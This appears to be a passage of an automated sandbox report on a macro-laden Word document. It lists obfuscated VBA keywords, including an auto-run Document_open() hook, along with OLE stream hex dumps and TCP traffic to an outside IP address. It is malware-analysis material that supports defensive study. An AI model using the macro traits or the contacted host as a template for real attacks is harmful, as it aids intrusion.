                                            RLurCDDF
                                            gglHam
                                            "budRDJKVnJRU"
                                            DRrKpoA
                                            "]an"
                                            lgZgGO
                                            "gcZaHCGUVJsFmL"
                                            "yKdJWHAniqHFCB"
                                            ThHBBDu
                                            tcYiEMeRH.WriteLine
                                            waSbS
                                            VfJHAA
                                            vutdEkdRL
                                            NSiRQzd
                                            "frvvJFHIkftmZHE"
                                            OtQPAJH
                                            AybxtEBCJ.WriteLine
                                            XTdPHz
                                            OBwIBy:
                                            JADCpjk.Close
                                            QZjuH
                                            "DkRmTYGAMxqHI"
                                            zOQlGPVC
                                            "dWnMFoTBPDqeJK"
                                            jPnRGLC
                                            CbMZSLFAM
                                            kboRA
                                            ORIzFDySE
                                            DRrKpoA.Close
                                            VAEDpBCV
                                            uJSEDH:
                                            QZjuH.CreateTextFile("EEGvGuF:\XrXnHGDDB\noadJZ.yGcKj")
                                            "bAurYaGPwGKRiG"
                                            bPFNuJ
                                            "koDuGqAOJBlLgZIEme"
                                            DyjPBI.CreateTextFile("OPLPBI:\fNyAExIq\jrtno.FyobBAAFE")
                                            hiZkEEF.WriteLine
                                            txKQv
                                            xCaTC.CreateTextFile("Oafyb:\RPNGMA\cmOgEyD.EEpGjE")
                                            vtDUw
                                            RkPWCDPC.WriteLine
                                            aLGptGA
                                            "kWzGMzIVefGB"
                                            "ncDMUIadusSIDx"
                                            VB_Name
                                            RkPWCDPC.Close
                                            "JCgblEAJizSfW"
                                            uJSEDH
                                            eUdbDAHHs.Close
                                            "HfXAPQQbXKJHFGu"
                                            eBddHTXP
                                            AybxtEBCJ
                                            OBwIBy
                                            RNgUODjsM.CreateTextFile("FyNFG:\ugXUH\cZIFypIHj.tRULIINC")
                                            VJbwzTDT.WriteLine
                                            ItSfCDCB
                                            Mid(Application.Name,
                                            JhiYfXc.Close
                                            PAxhJ
                                            "TJahKRWdrvHFIy"
                                            xOnWA
                                            xkJxAAC.CreateTextFile("tLvao:\aGKUA\AhQhj.BDOQSJWG")
                                            "lRcGHADAHrlHJJA"
                                            oOysMtDG
                                            syDRd
                                            dLrgANHCG.CreateTextFile("lBasV:\tFGoGJd\zBuHfBCN.AHGggII")
                                            cTfCJ
                                            hiZkEEF
                                            "GhifcDKlpA"
                                            oOysMtDG.WriteLine
                                            FgmzCEm
                                            bPFNuJ:
                                            "HwixyOCYxmojd"
                                            UMzHfyAfA
                                            oOysMtDG:
                                            "eSpcpGDZncccrFb"
                                            oMcHDXEF
                                            reTrs
                                            "BWSOKPyHMnSQxi"
                                            EJEApM
                                            JADCpjk:
                                            XjhOHEMDC
                                            gQxBD
                                            "xtsHGQjpNzDIYJ"
                                            pSFXACJ
                                            wUoJIFDD
                                            HOkLRDGd
                                            njKwJdA.Close
                                            RvFOAEPH
                                            HMyHCQCGu
                                            njKwJdA
                                            "GqMIEnOQFEEDsE"
                                            bGMXEIA
                                            eUdbDAHHs:
                                            rtGyqOth
                                            wuKBFvqI
                                            hSbDPCC
                                            hSbDPCC.CreateTextFile("pygNv:\znIpFIR\yniMs.nmiIGDEDA")
                                            rEeiBJ.CreateTextFile("VxskFWpm:\cuyOFYrFJ\SZSlaGJZi.TeBYCDZ")
                                            cSHkDL
                                            blQEM
                                            nKtfECko
                                            RUMGE
                                            Zpeehqbjjey.Create
                                            uJSEDH.WriteLine
                                            xNJyUCNg
                                            "BQumCJmmiAGIKv"
                                            yyoqEHETu
                                            GNnZJzE
                                            HnBvAEH.CreateTextFile("ehLoAm:\PAVZiAGU\jVPHv.fAgoFBYmC")
                                            yUWxTlVAC
                                            TxAVq
                                            EVOuqJnGD
                                            "cnLcFxEphoEbAFA"
                                            CksLJVJ
                                            PmBxcD.Close
                                            njKwJdA:
                                            XsKjcKE
                                            "GDTGdEJpuRnDBFQ"
                                            "ZRotGHIxyrpSqvsXCC"
                                            SOunIGkF
                                            "]anw["
                                            JhiYfXc
                                            ChWZVJiB
                                            lEOlGYxK.CreateTextFile("sojcFeJ:\zxDxYHq\rNbtS.PtHuEEP")
                                            "OnehVAaWbfCAcAjsG"
                                            iytziJ
                                            "ohaTGaUTSwwDv"
                                            "qMnfwCwbPJC"
                                            "vRrzDEngIQvFPJfE"
                                            zgBjJOGEH
                                            tcYiEMeRH:
                                            OBwIBy.Close
                                            NtpdEJDH
                                            gQxBD.WriteLine
                                            "WMwcBSqFohy"
                                            EUMDPGt.WriteLine
                                            gQxBD.Close
                                            PAxhJ.CreateTextFile("dFVzNBE:\EBCOlEEOJ\KlKcJKk.SVIvoAEqG")
                                            QrVtQr
                                            VJbwzTDT
                                            UPhhYZEF.WriteLine
                                            uJSEDH.Close
                                            Zpeehqbjjey
                                            RNgUODjsM
                                            NBjEFGnEA
                                            oOysMtDG.Close
                                            YzIkA
                                            tcYiEMeRH
                                            xxYeFGUAH.CreateTextFile("eCzvxHN:\cgVnKGAT\YcnDi.YqiJOp")
                                            "TOSxJaIzCudpDlB"
                                            fUDmDCt
                                            "utFMeJhUKJhJ"
                                            aTfPCap
                                            "SjDfYFUFPynYGu"
                                            wCjuwBBGN
                                            JHrNWdBsW
                                            bPFNuJ.Close
                                            XwZxsHCGt.CreateTextFile("TNJvoD:\walkrfAE\EalrWFWTE.wDSOEJ")
                                            "rVpvDaGGxNfeNUF"
                                            hiZkEEF.Close
                                            Nothing
                                            UPhhYZEF:
                                            IYKcgC
                                            dTtuVsDVA
                                            VcIiQJFi
                                            JhiYfXc.WriteLine
                                            "jVSXGfhYCxoHFD"
                                            lEOlGYxK
                                            "ozrZBTZBTMMIBB"
                                            hiZkEEF:
                                            "goMgGBdJMUDLAG"
                                            WtNcAKUFt
                                            "MvkIFCHFTnRqD"
                                            PmBxcD.WriteLine
                                            rgBSB.CreateTextFile("PkeJHBJJH:\ODJMGCw\NefpJHvCX.XzgyeCQuA")
                                            SynsDAgHG
                                            "PFQdBLHsDnfTZv"
                                            vitXEH
                                            "OTLmJCwhyQMFzlB"
                                            oUWfJGBeE
                                            "OcgtIFEeoIFhxt"
                                            Error
                                            "lHuxHADjraNFBgI"
                                            CCnbXRBeA
                                            AiICOj
                                            VcIiQJFi.CreateTextFile("gNgYGZ:\CatdBMGGg\qGsdAdOQH.cJsxtdJE")
                                            CmcBTTABc
                                            Attribute
                                            CHKzNBD
                                            TFXNGIiH
                                            "cGDcNrWsPeGCDF"
                                            LVadAF
                                            mmkTuwH
                                            eUdbDAHHs
                                            Function
                                            VbMBBgf
                                            MfgnKGWI
                                            ukrnIFCE
                                            EbuwEJS
                                            WxujBIAMz
                                            DRrKpoA:
                                            "dvqIBFEqwfkI"
                                            kskMAAHA
                                            OBwIBy.WriteLine
                                            xCaTC
                                            zLkRiC
                                            DRrKpoA.WriteLine
                                            "dxIGdcCHBKYgde"
                                            VBA Code
                                            VBA File Name: Qafkrimwsho, Stream Size: 697
                                            General
                                            Stream Path:Macros/VBA/Qafkrimwsho
                                            VBA File Name:Qafkrimwsho
                                            Stream Size:697
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 ae c5 45 f2 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                            VBA Code Keywords

                                            Keyword
                                            Attribute
                                            VB_Name
                                            "Qafkrimwsho"
                                            VBA Code
                                            VBA File Name: Wm_t404p8v_, Stream Size: 1106
                                            General
                                            Stream Path:Macros/VBA/Wm_t404p8v_
                                            VBA File Name:Wm_t404p8v_
                                            Stream Size:1106
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 ae c5 f3 f6 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                            VBA Code Keywords

                                            Keyword
                                            False
                                            Private
                                            VB_Exposed
                                            Attribute
                                            VB_Creatable
                                            VB_Name
                                            Document_open()
                                            VB_PredeclaredId
                                            VB_GlobalNameSpace
                                            VB_Base
                                            VB_Customizable
                                            VB_TemplateDerived
                                            VBA Code

                                            Streams

                                            Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                                            General
                                            Stream Path:\x1CompObj
                                            File Type:data
                                            Stream Size:146
                                            Entropy:4.00187355764
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00
                                            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                            General
                                            Stream Path:\x5DocumentSummaryInformation
                                            File Type:data
                                            Stream Size:4096
                                            Entropy:0.279952994103
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + . . . . . . . . T . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 520
                                            General
                                            Stream Path:\x5SummaryInformation
                                            File Type:data
                                            Stream Size:520
                                            Entropy:4.06136102648
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . h . . . . . . . T . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 d8 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 68 01 00 00 04 00 00 00 54 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 40 01 00 00 09 00 00 00 d0 00 00 00
                                            Stream Path: 1Table, File Type: data, Stream Size: 6424
                                            General
                                            Stream Path:1Table
                                            File Type:data
                                            Stream Size:6424
                                            Entropy:6.13606471955
                                            Base64 Encoded:True
                                            Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                            Data Raw:6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                            Stream Path: Data, File Type: data, Stream Size: 99189
                                            General
                                            Stream Path:Data
                                            File Type:data
                                            Stream Size:99189
                                            Entropy:7.39018675385
                                            Base64 Encoded:True
                                            Data ASCII:u . . . D . d . . . . . . . . . . . . . . . . . . . . . / g . , b . r . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . . . . . . c . . . 8 . . . . A . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . A . C . = . > . : . . 1 . . . . . " . . . . . . . . . . . . . . . . . . . . . . . R . . . . . . . . . { . . B g . . . m d . z . M . . . . . . . . . . . . D . . . . . . . . F . . . . . . { . . B g . . . m d . z . M . . . . . . . .
                                            Data Raw:75 83 01 00 44 00 64 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 2f 67 eb 2c 62 01 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 6a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 63 00 0b f0 38 00 00 00 04 41 01 00 00 00 3f 01 00 00 06 00 bf 01 00 00 10 00 ff 01 00 00 08 00 80 c3 14 00
                                            Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 488
                                            General
                                            Stream Path:Macros/PROJECT
                                            File Type:ASCII text, with CRLF line terminators
                                            Stream Size:488
                                            Entropy:5.44671163464
                                            Base64 Encoded:True
                                            Data ASCII:I D = " { 3 2 8 4 0 4 E F - 4 1 6 C - 4 D E 8 - 9 A 4 2 - 2 0 1 5 6 D 2 2 2 C 2 6 } " . . D o c u m e n t = W m _ t 4 0 4 p 8 v _ / & H 0 0 0 0 0 0 0 0 . . M o d u l e = Q a f k r i m w s h o . . M o d u l e = O i 5 o e l v 0 _ s 4 . . E x e N a m e 3 2 = " T j 8 d t f s u o p d k " . . N a m e = " m w " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 1 0 1 2 B 2 B 0 B 6 B 0 B 6 B 0 B 6 B 0 B 6 " . . D P B = " 8 2 8 0 2 0 5 0 9 3 5 1 9 3
                                            Data Raw:49 44 3d 22 7b 33 32 38 34 30 34 45 46 2d 34 31 36 43 2d 34 44 45 38 2d 39 41 34 32 2d 32 30 31 35 36 44 32 32 32 43 32 36 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 57 6d 5f 74 34 30 34 70 38 76 5f 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 51 61 66 6b 72 69 6d 77 73 68 6f 0d 0a 4d 6f 64 75 6c 65 3d 4f 69 35 6f 65 6c 76 30 5f 73 34 0d 0a 45 78 65 4e 61 6d 65 33 32 3d
                                            Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 110
                                            General
                                            Stream Path:Macros/PROJECTwm
                                            File Type:data
                                            Stream Size:110
                                            Entropy:3.60650024781
                                            Base64 Encoded:False
                                            Data ASCII:W m _ t 4 0 4 p 8 v _ . W . m . _ . t . 4 . 0 . 4 . p . 8 . v . _ . . . Q a f k r i m w s h o . Q . a . f . k . r . i . m . w . s . h . o . . . O i 5 o e l v 0 _ s 4 . O . i . 5 . o . e . l . v . 0 . _ . s . 4 . . . . .
                                            Data Raw:57 6d 5f 74 34 30 34 70 38 76 5f 00 57 00 6d 00 5f 00 74 00 34 00 30 00 34 00 70 00 38 00 76 00 5f 00 00 00 51 61 66 6b 72 69 6d 77 73 68 6f 00 51 00 61 00 66 00 6b 00 72 00 69 00 6d 00 77 00 73 00 68 00 6f 00 00 00 4f 69 35 6f 65 6c 76 30 5f 73 34 00 4f 00 69 00 35 00 6f 00 65 00 6c 00 76 00 30 00 5f 00 73 00 34 00 00 00 00 00
                                            Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5146
                                            General
                                            Stream Path:Macros/VBA/_VBA_PROJECT
                                            File Type:data
                                            Stream Size:5146
                                            Entropy:5.51240945881
                                            Base64 Encoded:False
                                            Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                                            Data Raw:cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                                            Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 630
                                            General
                                            Stream Path:Macros/VBA/dir
                                            File Type:data
                                            Stream Size:630
                                            Entropy:6.3062184781
                                            Base64 Encoded:True
                                            Data ASCII:. r . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . m . . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . . . . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . N o r m a . l . E N . C r . m . . a . F . . . . . . . . * \\ C . . . . . . . . a . . . ! O f f i
                                            Data Raw:01 72 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 6d a2 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 08 e2 e3 61 06 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d
                                            Stream Path: WordDocument, File Type: data, Stream Size: 25134
                                            General
                                            Stream Path:WordDocument
                                            File Type:data
                                            Stream Size:25134
                                            Entropy:3.92042329439
                                            Base64 Encoded:False
                                            Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . Y \\ . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . b . . . b . . . Y T . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:ec a5 c1 00 5f c0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 59 5c 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 2e 62 00 00 62 7f 00 00 62 7f 00 00 59 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                            Network Behavior

                                            Network Port Distribution

                                            TCP Packets

Timestamp                           Source Port  Dest Port  Source IP      Dest IP
Jan 6, 2021 08:57:41.249049902 CET  49167        80         192.168.2.22   176.53.69.151
Jan 6, 2021 08:57:41.322602034 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.322690010 CET  49167        80         192.168.2.22   176.53.69.151
Jan 6, 2021 08:57:41.325428963 CET  49167        80         192.168.2.22   176.53.69.151
Jan 6, 2021 08:57:41.428926945 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.428961039 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.428980112 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.428996086 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.429013014 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.429024935 CET  49167        80         192.168.2.22   176.53.69.151
Jan 6, 2021 08:57:41.429029942 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.429040909 CET  49167        80         192.168.2.22   176.53.69.151
Jan 6, 2021 08:57:41.429047108 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.429064035 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.429068089 CET  49167        80         192.168.2.22   176.53.69.151
Jan 6, 2021 08:57:41.429080963 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.429095984 CET  49167        80         192.168.2.22   176.53.69.151
Jan 6, 2021 08:57:41.429100990 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.429132938 CET  49167        80         192.168.2.22   176.53.69.151
Jan 6, 2021 08:57:41.503504038 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.503540993 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.503559113 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.503576040 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.503592968 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.503607988 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.503628969 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.503645897 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.503660917 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.503671885 CET  49167        80         192.168.2.22   176.53.69.151
Jan 6, 2021 08:57:41.503681898 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.503693104 CET  49167        80         192.168.2.22   176.53.69.151
Jan 6, 2021 08:57:41.503694057 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.503707886 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.503720045 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.503740072 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.503758907 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.503774881 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.503792048 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.503801107 CET  49167        80         192.168.2.22   176.53.69.151
Jan 6, 2021 08:57:41.503808022 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.503815889 CET  49167        80         192.168.2.22   176.53.69.151
Jan 6, 2021 08:57:41.503823996 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.503839970 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.503871918 CET  49167        80         192.168.2.22   176.53.69.151
Jan 6, 2021 08:57:41.577363968 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.577418089 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.577435970 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.577452898 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.577471018 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.577486038 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.577498913 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.577512026 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.577533007 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.577534914 CET  49167        80         192.168.2.22   176.53.69.151
Jan 6, 2021 08:57:41.577550888 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.577567101 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.577570915 CET  49167        80         192.168.2.22   176.53.69.151
Jan 6, 2021 08:57:41.577577114 CET  49167        80         192.168.2.22   176.53.69.151
Jan 6, 2021 08:57:41.577584028 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.577600002 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.577613115 CET  49167        80         192.168.2.22   176.53.69.151
Jan 6, 2021 08:57:41.577620029 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.577636957 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.577644110 CET  49167        80         192.168.2.22   176.53.69.151
Jan 6, 2021 08:57:41.577652931 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.577672958 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.577675104 CET  49167        80         192.168.2.22   176.53.69.151
Jan 6, 2021 08:57:41.577694893 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.577713013 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.577727079 CET  49167        80         192.168.2.22   176.53.69.151
Jan 6, 2021 08:57:41.577730894 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.577747107 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.577763081 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.577764034 CET  49167        80         192.168.2.22   176.53.69.151
